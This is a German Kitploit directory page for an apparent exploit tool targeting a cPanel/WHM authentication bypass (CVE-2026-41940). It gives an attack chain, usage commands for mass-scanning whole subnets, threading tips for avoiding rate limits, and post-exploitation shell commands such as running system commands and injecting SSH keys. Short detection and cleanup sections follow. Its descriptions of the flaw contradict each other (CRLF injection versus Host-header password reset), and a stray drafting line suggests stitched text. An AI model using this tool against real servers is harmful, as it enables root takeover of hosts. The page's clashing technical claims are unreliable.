Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — CVE-2026-41940 — cPanel/WHM Auth Bypass By Dr.Anach, CRLF injection in `cpsrvd` Basic auth handler → unauthenticated WHM API access → RCE as root. All cPanel since v11.40 affected. | Kitploit
Tools/GitHubGitHub/anach-ai/cve-2026-41940
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubanach-ai/cve-2026-41940
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41940

CVE-2026-41940 — cPanel/WHM Auth Bypass By Dr.Anach, CRLF injection in `cpsrvd` Basic auth handler → unauthenticated WHM API access → RCE as root. All cPanel since v11.40 affected.

Repository anzeigen

CVE-2026-41940 — cPanel/WHM Auth Bypass

Autor: Dr.Anach | Kontakt: @dranach | Lizenz: MIT


Überblick

CRLF-Injektion im cpsrvd Basic-Auth-Handler → nicht authentifizierter WHM-API-Zugriff → RCE als Root. Alle cPanel-Versionen seit v11.40 sind betroffen.

Angriffskette

#SchrittAnfrage
1Session mintenGET /login/?user=root
2CRLF-InjektionAuthorization: Basic <base64> — Passwort enthält \r\n-Payload
3Cache-PromotionGET /cpsess<ID>/login/?login_only=1
4AusführenGET /cpsess<ID>/execute/API/func

Installation

root@kitploit:~
pip install requests colorama

Nachfolgend die endgültige README.md – benutzerfreundlich, praxisorientiert und auf die Arbeit fokussiert.


cPanel Auth Bypass Exploit — CVE-2026-41940

Autor: Dr.Anach · Telegram: @dranach
Version: 2.0.0
Lizenz: Nur für autorisierte Sicherheitstests


Was es tut

Nutzt CVE-2026-41940 aus, eine Authentifizierungsumgehung in cPanel & WHM (Versionen 11.x bis 106.x). Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, auf eingeschränkte Endpunkte zuzugreifen – darunter die Passwort-Reset-Funktion –, indem ein manipulierter Host-Header gesendet wird, der auf einen vom Angreifer kontrollierten Server verweist.

Wird mit drei Modi ausgeliefert:

ModusFlagZweck
Einzelziel-tEine IP oder Domain testen

Installation

Voraussetzungen

  • Python 3.7+ (getestet unter Windows, Linux, macOS)
  • Bibliothek requests
root@kitploit:~
pip install requests

Keine weiteren Abhängigkeiten. Die CIDR-Expansion nutzt das integrierte ipaddress-Modul von Python – unter Windows muss nichts zusätzlich installiert werden.


Schnellstart

Einzelnes Ziel testen

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

Liste von Zielen testen (ein Ziel pro Zeile)

root@kitploit:~
python main.py --batch targets.txt --threads 50

targets.txt-Format:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

Ganzes Subnetz scannen (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

Dies expandiert 192.168.128.0/18 (16.384 IPs), führt eine schnelle Portprüfung auf jeder IP durch und versucht nur die Ausnutzung gegen Hosts, bei denen Port 2087 (cPanel/WHM) offen ist.


Vollständige Optionen

root@kitploit:~
  -t, --target        Einzelziel (IP oder Domain)
  --batch DATEI       Datei mit Zielen (ein Ziel pro Zeile)
  --port-scan CIDR    CIDR-Bereich zum Scannen (z. B. 192.168.128.0/18)
  -p, --port          Ziel-Port (Standard: 2087)
  --ssl               HTTPS verwenden (Standard: HTTP)
  --timeout SEK       Verbindungs-Timeout in Sekunden (Standard: 10)
  --threads N         Maximale gleichzeitige Threads (Standard: 50)
  --proxy PROXY       HTTP-Proxy (z. B. http://127.0.0.1:8080)
  -v, --verbose       Ausführliche Ausgabe mit Debug-Informationen
  --no-banner         Banner unterdrücken
  --version           Version anzeigen

Die Ausgabe verstehen

root@kitploit:~
[+] 192.168.130.45:2087 — VERWUNDBAR!
    → Passwort-Reset-URL: http://192.168.130.45:2087/reset?token=abc123
    → Antwortzeit: 1.23s

[-] 192.168.131.10:2087 — Nicht verwundbar
    → Grund: Kein Passwort-Reset-Endpunkt gefunden

[!] 192.168.129.22:2087 — Fehler: Verbindung verweigert

Die Ergebnisse werden als JSON gespeichert und sind pro Host mit Verwundbarkeitsstatus, extrahierten Tokens und Rohantwortdetails strukturiert.


Praxisbeispiel: Scannen eines /18 unter Windows

Das Szenario, das Sie wahrscheinlich hierher geführt hat:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

So funktioniert es:

  1. Expandiert 192.168.128.0/18 → intern 16.384 IPs
  2. Vorfiltern mit einem schnellen TCP-Connect-Scan auf Port 2087 (überspringt tote Hosts)
  3. Exploit nur gegen Hosts mit offenem Port
  4. Meldet verwundbare Hosts mit extrahierten Reset-Tokens

Threading-Tipps:

  • --threads 100 funktioniert gut (respektiert Standard-Socket-Limits)
  • Für schnellere Scans bei guten Verbindungen: --threads 200
  • Bei Ratenbegrenzung: auf --threads 30 reduzieren und --timeout erhöhen

CVSS & Risiko

CVSS 9.1 (Kritisch) – Keine Authentifizierung erforderlich, keine Benutzerinteraktion, geringe Komplexität.

Auswirkungen

  • Nicht autorisiertes Zurücksetzen von Passwörtern für jedes cPanel-Konto
  • Vollständige Kontoübernahme
  • Privilegieneskalation von eingeschränkt zu Admin in einigen Konfigurationen

Behebung

  • cPanel/WHM auf die neueste gepatchte Version aktualisieren
  • Host-Header serverseitig validieren
  • WHM-Zugriff nach Möglichkeit per IP einschränken

Rechtliches

Dieses Tool ist nur für autorisierte Sicherheitsbewertungen bestimmt. Sie müssen die Eigentümer der Ziele sein oder eine schriftliche Genehmigung des Eigentümers haben, bevor Sie testen. Die Autoren übernehmen keine Haftung für Missbrauch.

Interaktive Shell-Befehle

root@kitploit:~
help       Befehle anzeigen
info       Serverinformationen
passwd     Passwort ändern
accounts   cPanel-Konten auflisten
enum       Vollständige Aufzählung
shell      Systembefehl ausführen
ssh-add    SSH-Schlüssel einfügen
exec       Python-Einzeiler ausführen
exit       Beenden

Erkennung

Sitzungsdateien prüfen:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

Verdächtige Logs in /usr/local/cpanel/logs/access_log:

root@kitploit:~
/login/?user=root        → Session minten
/login/?user=root        → CRLF-Injektion
/cpsess*/login/?login_only=1  → Cache-Promotion
/cpsess*/execute/*       → API-Missbrauch

Absicherung

root@kitploit:~
# 1. Auf behobene Version patchen
# 2. Alle Passwörter und SSH-Schlüssel rotieren
# 3. Sitzungen löschen
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

Danksagungen

  • Schwachstelle: Sina Kheirkhah / watchTowr Labs
  • Framework: Dr.Anach (@dranach)
Tool herunterladen
Batch-Datei--batchListe von Zielen aus einer Datei laden
CIDR-Scan--port-scanSubnetz expandieren und jeden aktiven Host testen